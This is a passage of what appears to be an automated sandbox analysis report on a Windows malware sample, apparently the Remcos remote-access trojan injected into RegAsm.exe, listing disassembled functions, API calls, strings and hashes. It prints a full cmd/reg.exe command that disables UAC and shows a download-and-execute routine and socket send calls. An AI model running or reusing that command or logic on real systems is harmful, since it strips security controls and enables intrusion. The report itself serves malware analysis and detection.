API ID: ClassCreateErrorLastRegisterWindow
String ID: 0$MsgWindowClass
API String ID: 2877667751-2410386613
Opcode ID: a7bf03488480a67a5ab74e572dd3e9b3283d69d087452f3b28ffeaf09d6b5029
Instruction ID: 921741f364e14ac5d494c0d6481b3569f22aad0bbfd2e997b493b5423d792a6e
Opcode Fuzzy Hash: a7bf03488480a67a5ab74e572dd3e9b3283d69d087452f3b28ffeaf09d6b5029
Instruction Fuzzy Hash: 910129B1D00219BBDB00DFD5ECC49EFBBBDEA04355F40053AF900A6240E77859058AA4

Uniqueness

Uniqueness Score: -1.00%

Function 00407755 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 43processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 0040779B
CloseHandle.KERNEL32(?), ref: 004077AA
CloseHandle.KERNEL32(?), ref: 004077AF

Strings

C:\Windows\System32\cmd.exe, xrefs: 00407796
/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 00407791

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CloseHandle$CreateProcess
String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
API String ID: 2922976086-4183131282
Opcode ID: 86afbde76f2a9426f4ed7e8e7c7881cd7a3c7ba11745d0fd7a0dc136aa7099f4
Instruction ID: bcd6b2dc2297655d1c2a6c7a9d844aadd79638dc8707381bf3a952a3ff6736b4
Opcode Fuzzy Hash: 86afbde76f2a9426f4ed7e8e7c7881cd7a3c7ba11745d0fd7a0dc136aa7099f4
Instruction Fuzzy Hash: BCF03676D4029D76CB20ABD6DC0EEDF7F7DEBC5B11F00056AF904A6141E6746404C6B9

Uniqueness

Uniqueness Score: -1.00%

Function 00407260 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 40COMMON

Download Yara Rule

Strings

C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe, xrefs: 004076C4
SG, xrefs: 004076DA

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: SG$C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
API String ID: 0-97610266
Opcode ID: a5e5064d23fdb4a5105bb888b891a2001f99cf11455aefb2b8df45e89f9c3324
Instruction ID: 1b954d03a55cc3c1a25a26db856d3c6076ddce7f3b9fad0ad77fefb3a3407f05
Opcode Fuzzy Hash: a5e5064d23fdb4a5105bb888b891a2001f99cf11455aefb2b8df45e89f9c3324
Instruction Fuzzy Hash: 2CF046B0F14A00EBCB0467655D186693A05A740356F404C77F907EA2F2EBBD5C41C61E

Uniqueness

Uniqueness Score: -1.00%

Function 0044333A Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,004432EB,?,?,0044328B,?), ref: 0044335A
GetProcAddress.KERNEL32(00000000,CorExitProcess,?,?,?,?,004432EB,?,?,0044328B,?), ref: 0044336D
FreeLibrary.KERNEL32(00000000,?,?,?,004432EB,?,?,0044328B,?), ref: 00443390

Strings

CorExitProcess, xrefs: 00443365
mscoree.dll, xrefs: 00443353

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: cc52f7ac488aa55dad4b7db89aaf695af0dd1fe717ea7d7a85019ca2162c21c0
Instruction ID: b4f1316bd170a33105784e50650a9bde6d9e9410588fddf83d5a1a7bf10dc45d
Opcode Fuzzy Hash: cc52f7ac488aa55dad4b7db89aaf695af0dd1fe717ea7d7a85019ca2162c21c0
Instruction Fuzzy Hash: 6AF0A430A00208FBDB149F55DC09B9EBFB4EF04713F0041A9FC05A2261CB349E40CA98

Uniqueness

Uniqueness Score: -1.00%

Function 004050E4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 35synchronizationCOMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00405120
SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 0040512C
WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 00405137
CloseHandle.KERNEL32(?), ref: 00405140

Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509

Strings

KeepAlive | Disabled, xrefs: 004050F9

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
String ID: KeepAlive | Disabled
API String ID: 2993684571-305739064
Opcode ID: 11e320f67abdd95442ebe69be37ae07741154b3609cf10b7525108ad99fbffe3
Instruction ID: c1447ea2195e795a2fa4d382ed9a15925dec3dc8ccf256ab7d783030aa8980db
Opcode Fuzzy Hash: 11e320f67abdd95442ebe69be37ae07741154b3609cf10b7525108ad99fbffe3
Instruction Fuzzy Hash: 4CF06271904711BBDB103B758D0A66B7A54AB02311F0009BEF982916E2D6798840CF9A

Uniqueness

Uniqueness Score: -1.00%

Function 0041ADC0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509

GetModuleHandleA.KERNEL32(00000000,00020009), ref: 0041ADF2
PlaySoundW.WINMM(00000000,00000000), ref: 0041AE00
Sleep.KERNEL32(00002710), ref: 0041AE07
PlaySoundW.WINMM(00000000,00000000,00000000), ref: 0041AE10

Strings

Alarm triggered, xrefs: 0041ADC9

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: PlaySound$HandleLocalModuleSleepTime
String ID: Alarm triggered
API String ID: 614609389-2816303416
Opcode ID: 458a9fadc2ddf1b51f38526f332080559b1bee2397fd5821544ba6e308cf5034
Instruction ID: 9c0713ce1321a11b0f254193fe9a85ef30a97b7eb59a64372af151f10574a600
Opcode Fuzzy Hash: 458a9fadc2ddf1b51f38526f332080559b1bee2397fd5821544ba6e308cf5034
Instruction Fuzzy Hash: 36E01226B44260779620377B6D4FD6F3D28DAC2B5170100BEFA0666192D9580C4586FB

Uniqueness

Uniqueness Score: -1.00%

Function 0041CD58 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041CDED), ref: 0041CD62
GetConsoleScreenBufferInfo.KERNEL32 ref: 0041CD6F
SetConsoleTextAttribute.KERNEL32(00000000,0000000C), ref: 0041CD7C
SetConsoleTextAttribute.KERNEL32(00000000,?), ref: 0041CD8F

Strings

______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041CD82

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Console$AttributeText$BufferHandleInfoScreen
String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
API String ID: 3024135584-2418719853
Opcode ID: 7fe6fe9ce11b1ae804115fcba13355f31785efbed8ffac05f5782df1f2ab6211
Instruction ID: 0b88db63cd78dea0703aeaf814a7171c31f7e2e6e0b1944ffb711cb25cf7542c
Opcode Fuzzy Hash: 7fe6fe9ce11b1ae804115fcba13355f31785efbed8ffac05f5782df1f2ab6211
Instruction Fuzzy Hash: B4E04872904315E7E31027B5EC4DDAB7B7CE745713B100266FA12915D39A749C40C6B5

Uniqueness

Uniqueness Score: -1.00%

Function 0044139A Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d82b14c4b7eddcab2a525b8a5736e815382cccc6b286473e45e20a4a09cb7dcc
Instruction ID: 3288ceb70b28299b768e57bc56a65f905b411dc47ae91625c595fe6b39b3afde
Opcode Fuzzy Hash: d82b14c4b7eddcab2a525b8a5736e815382cccc6b286473e45e20a4a09cb7dcc
Instruction Fuzzy Hash: 4D71C431900256ABEF21CF55C884AFFBBB5EF95350F14012BE812A72A1D7748CC1CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00444CFB Relevance: 7.7, APIs: 5, Instructions: 187COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169

_free.LIBCMT ref: 00444E06
_free.LIBCMT ref: 00444E1D
_free.LIBCMT ref: 00444E3C
_free.LIBCMT ref: 00444E57
_free.LIBCMT ref: 00444E6E

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: _free$AllocateHeap
String ID:
API String ID: 3033488037-0
Opcode ID: 40f9e7cc2be6d4603e073625857eb528f872492eb2fa809e82d56bfb9c8f3841
Instruction ID: 75a60bec03265776b93b53542ea819fdab521e44af267d44e1f719a945e8e2e2
Opcode Fuzzy Hash: 40f9e7cc2be6d4603e073625857eb528f872492eb2fa809e82d56bfb9c8f3841
Instruction Fuzzy Hash: 5451D371A00704AFEB20DF6AC841B6673F4FF85729B14456EE819D7250E739EE01CB88

Uniqueness

Uniqueness Score: -1.00%

Function 00449365 Relevance: 7.7, APIs: 5, Instructions: 171timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F234), ref: 004493CF
WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 00449447
WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 00449474
_free.LIBCMT ref: 004493BD

Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000), ref: 00446798
Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA

_free.LIBCMT ref: 00449589

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
String ID:
API String ID: 1286116820-0
Opcode ID: 0a3c6fbe7e5a1f133d1032b40f823fca6b3dff27f0c0d46b4efcd8c71cfe77a6
Instruction ID: c95a83c4fc9d8f5f381c6ef12c4bd90d50aad01b0883e3b7d6e96279f2ead045
Opcode Fuzzy Hash: 0a3c6fbe7e5a1f133d1032b40f823fca6b3dff27f0c0d46b4efcd8c71cfe77a6
Instruction Fuzzy Hash: 71511A71904205EBEB14EFA9DD819AFB7BCEF44324F10066FE51493291EB788E42DB58

Uniqueness

Uniqueness Score: -1.00%

Function 0040F8FD Relevance: 7.6, APIs: 5, Instructions: 132processCOMMON

Download Yara Rule

APIs

Part of subcall function 0041BFB7: GetCurrentProcess.KERNEL32(?,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFC8

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F91B
Process32FirstW.KERNEL32(00000000,?), ref: 0040F93F
Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F94E
CloseHandle.KERNEL32(00000000), ref: 0040FB05

Part of subcall function 0041BFE5: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040F5F9,00000000,?,?,00475338), ref: 0041BFFA

Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5
Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C208

Process32NextW.KERNEL32(00000000,0000022C), ref: 0040FAF6

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Process$OpenProcess32$Next$CloseCreateCurrentFirstHandleSnapshotToolhelp32
String ID:
API String ID: 4269425633-0
Opcode ID: 340df89f7b7462a5cf1a3eb52fc607024e8c20bd1839c838a7e8e46198f65b91
Instruction ID: d179df5438ecf7187d550cf9263b6860c2801d48d571b2859f9d543a591e132f
Opcode Fuzzy Hash: 340df89f7b7462a5cf1a3eb52fc607024e8c20bd1839c838a7e8e46198f65b91
Instruction Fuzzy Hash: 784116311083419BC325F722DC55AEFB3A5AF94345F50493EF48A921E2EF385A49C75A

Uniqueness

Uniqueness Score: -1.00%

Function 00443DF9 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00443E6B
_free.LIBCMT ref: 00443E8B

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: f0d0e5395ad938097262dc5d88931f0578874cbbbca0d0094bbf983591b431c8
Instruction ID: 5dce3a056f7b38871bf3701478ebec2c01ef4ac0d1e4adeac0a27022f106ca0c
Opcode Fuzzy Hash: f0d0e5395ad938097262dc5d88931f0578874cbbbca0d0094bbf983591b431c8
Instruction Fuzzy Hash: 0741F536A012009FEB20DF78C881A5EB3F1EF89B14F2545AEE515EB341DB35AE01CB84

Uniqueness

Uniqueness Score: -1.00%

Function 0045112C Relevance: 7.6, APIs: 5, Instructions: 110COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,?,00000000,00000000,00000000,0042DD01,?,?,?,00000001,00000000,?,00000001,0042DD01,0042DD01), ref: 00451179
__alloca_probe_16.LIBCMT ref: 004511B1
MultiByteToWideChar.KERNEL32(?,00000001,?,00000000,00000000,0042DD01,?,?,?,00000001,00000000,?,00000001,0042DD01,0042DD01,?), ref: 00451202
GetStringTypeW.KERNEL32(00000001,00000000,00000000,00000001,?,?,?,00000001,00000000,?,00000001,0042DD01,0042DD01,?,00000002,00000000), ref: 00451214
__freea.LIBCMT ref: 0045121D

Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
String ID:
API String ID: 313313983-0
Opcode ID: c0c27e3fa0fc37b5352cac75d9871c7cd610c85ad5d081213d6c80f72d2fc676
Instruction ID: 2862a929c21554b3885a63a70f5d1b49ed21d23a3953ed9914841bfcf42aa681
Opcode Fuzzy Hash: c0c27e3fa0fc37b5352cac75d9871c7cd610c85ad5d081213d6c80f72d2fc676
Instruction Fuzzy Hash: 6631D271A0020AABDF24DFA5DC41EAF7BA5EB04315F0445AAFC04D72A2E739CD55CB94

Uniqueness

Uniqueness Score: -1.00%

Function 0044F35A Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 0044F363
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044F386

Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044F3AC
_free.LIBCMT ref: 0044F3BF
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044F3CE

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: be8aad2c18c16d35f713b979a96ac7f1c772162f60e003adf0fa877a85dcd87d
Instruction ID: 8337c1946637dec1c7c9c61cb05458c13fbc509b7d73539ecc926bc10a2836fd
Opcode Fuzzy Hash: be8aad2c18c16d35f713b979a96ac7f1c772162f60e003adf0fa877a85dcd87d
Instruction Fuzzy Hash: 2301B173601755BB37211ABA5C8CC7F6A6CDAC6FA5315013FFD14C2202EA68CD0581B9

Uniqueness

Uniqueness Score: -1.00%

Function 00448299 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,00000000,00000000,0043BC87,00000000,00000000,?,0043BD0B,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044829E
_free.LIBCMT ref: 004482D3
_free.LIBCMT ref: 004482FA
SetLastError.KERNEL32(00000000,?,00405103), ref: 00448307
SetLastError.KERNEL32(00000000,?,00405103), ref: 00448310

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 3b5a676440ed160f08d3b9c67501060176d9d4d3bcfe02f134d94644f9898a15
Instruction ID: 817e1e76de570c2b023109a843fda652767a1b5a915d0172e9d2adf04509528a
Opcode Fuzzy Hash: 3b5a676440ed160f08d3b9c67501060176d9d4d3bcfe02f134d94644f9898a15
Instruction Fuzzy Hash: 5601F936500B0067F3112A2A5C8596F2559EBC2B7A735452FFD19A22D2EFADCC01816D

Uniqueness

Uniqueness Score: -1.00%

Function 004509BC Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 004509D4

Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000), ref: 00446798
Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA

_free.LIBCMT ref: 004509E6
_free.LIBCMT ref: 004509F8
_free.LIBCMT ref: 00450A0A
_free.LIBCMT ref: 00450A1C

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
Instruction ID: 8e1836d4b3683ea2f551dac33bf8b94159c93f8dbbc189607f67f5fa0db289e6
Opcode Fuzzy Hash: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
Instruction Fuzzy Hash: F3F04F76504600B79620EB5DE8C2C1B73D9EA0571A795891BF66CDB612CB38FCC0869C

Uniqueness

Uniqueness Score: -1.00%

Function 00444048 Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00444066

Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000), ref: 00446798
Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA

_free.LIBCMT ref: 00444078
_free.LIBCMT ref: 0044408B
_free.LIBCMT ref: 0044409C
_free.LIBCMT ref: 004440AD

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
Instruction ID: c4ed0220327abb1134bcf7d54e43c2409a3611c90002b0fe773cef56a7474a4d
Opcode Fuzzy Hash: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
Instruction Fuzzy Hash: 11F03AB18009208FA631AF2DBD414053B61E705769346822BF62C62A70C7B94ED2CFCF

Uniqueness

Uniqueness Score: -1.00%

Function 00406EB0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 222filenetworkCOMMON

Download Yara Rule

APIs

ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406FBC
URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 004070A0

Strings

C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe, xrefs: 00407007, 0040712F
open, xrefs: 00406FB6

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: DownloadExecuteFileShell
String ID: C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe$open
API String ID: 2825088817-1632494013
Opcode ID: 39f0ec91822bdc268639dd33d552a14f293a6daabfd4338354c1a1d768501c41
Instruction ID: 27a8b34c094a82f854f2ee3e6b31e6014a71d41456184bc7540e3ceb6c1d0c01
Opcode Fuzzy Hash: 39f0ec91822bdc268639dd33d552a14f293a6daabfd4338354c1a1d768501c41
Instruction Fuzzy Hash: 6561A171B0830166CA24FB76C8569BE37A59F81748F50093FB942772D2EE3C9905C69B

Uniqueness

Uniqueness Score: -1.00%

Function 0044E6E9 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 168COMMON

Download Yara Rule

APIs

_strpbrk.LIBCMT ref: 0044E738
_free.LIBCMT ref: 0044E855

Part of subcall function 0043BD19: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0043BD1B
Part of subcall function 0043BD19: GetCurrentProcess.KERNEL32(C0000417,?,00405103), ref: 0043BD3D
Part of subcall function 0043BD19: TerminateProcess.KERNEL32(00000000,?,00405103), ref: 0043BD44

Strings

*?, xrefs: 0044E72C
., xrefs: 0044EA0C

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
String ID: *?$.
API String ID: 2812119850-3972193922
Opcode ID: 6703a85dd49711e1afab558f77f60869b6155e4f96c4351f2947c71862cae23b
Instruction ID: 94a4b4bbf586d133b1ca6d09685756ea089c4dad0dcc4a5060c65dcbb11523ea
Opcode Fuzzy Hash: 6703a85dd49711e1afab558f77f60869b6155e4f96c4351f2947c71862cae23b
Instruction Fuzzy Hash: B951C375E00109EFEF14DFAAC881AAEBBB5FF58314F25816EE454E7301E6399E018B54

Uniqueness

Uniqueness Score: -1.00%

Function 00415AEA Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 163COMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(?,?), ref: 00415B0F
GetTickCount.KERNEL32 ref: 00415B86

Strings

!D@, xrefs: 00417089
NG, xrefs: 00415B3E

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CountEventTick
String ID: !D@$NG
API String ID: 180926312-2721294649
Opcode ID: 94ee7e812a9a4d3a64b1e0e3f9ad2f759f23415ed7ce79fe2a4f7e21ada5cbc8
Instruction ID: 1740d3d485f2be3f914829e5aa2a54ae858af1ae40273f66f7ff2800e9d96298
Opcode Fuzzy Hash: 94ee7e812a9a4d3a64b1e0e3f9ad2f759f23415ed7ce79fe2a4f7e21ada5cbc8
Instruction Fuzzy Hash: 7E51A1316083019AC724FB32D852AEF73A5AF94314F50493FF54A671E2EF3C5949C68A

Uniqueness

Uniqueness Score: -1.00%

Function 00409EA3 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 157COMMON

Download Yara Rule

APIs

GetKeyboardLayoutNameA.USER32(?), ref: 00409ED3

Part of subcall function 004048C8: connect.WS2_32(?,?,?), ref: 004048E0

Part of subcall function 0041C515: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0041C52A

Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36

Strings

PG, xrefs: 00409EFE
NG, xrefs: 00409F33
XQG, xrefs: 00409F48

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CreateFileKeyboardLayoutNameconnectsend
String ID: XQG$NG$PG
API String ID: 1634807452-3565412412
Opcode ID: b3c7c28a966e03d1d34acdb6eedfacfd60c60fafb06e56b7e0cb98747a05855f
Instruction ID: e0ccbd324811511655e6ba18c086c0ffec884fa52ef92f7e14ea490dcf81b303
Opcode Fuzzy Hash: b3c7c28a966e03d1d34acdb6eedfacfd60c60fafb06e56b7e0cb98747a05855f
Instruction Fuzzy Hash: BA5133315082415AC324F732D852AEFB3E5AFD4348F50493FF44A671E6EF78594AC649

Uniqueness

Uniqueness Score: -1.00%

Function 00442385 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004424DE
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004424F3

Strings

`#D, xrefs: 004424ED
`#D, xrefs: 00442400

Memory Dump Source

Source File: 0000000B.00000002.871935224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: `#D$`#D
API String ID: 885266447-2450397995
Opcode ID: 36fac044672f79bbd2692348072d6fa41419b258ac2755bfc370d2617ef2a991
Instruction ID: d0478598ef992627c852fcfbe86add3ca1c9fa58067414995f231753f3186543
Opcode Fuzzy Hash: 36fac044672f79bbd2692348072d6fa41419b258ac2755bfc370d2617ef2a991
Instruction Fuzzy Hash: 78519071A00208AFDF18DF59C980AAEBBB2FB94314F59C19AF81897361D7B9DD41CB44

Uniqueness

Uniqueness Score: -1.00%

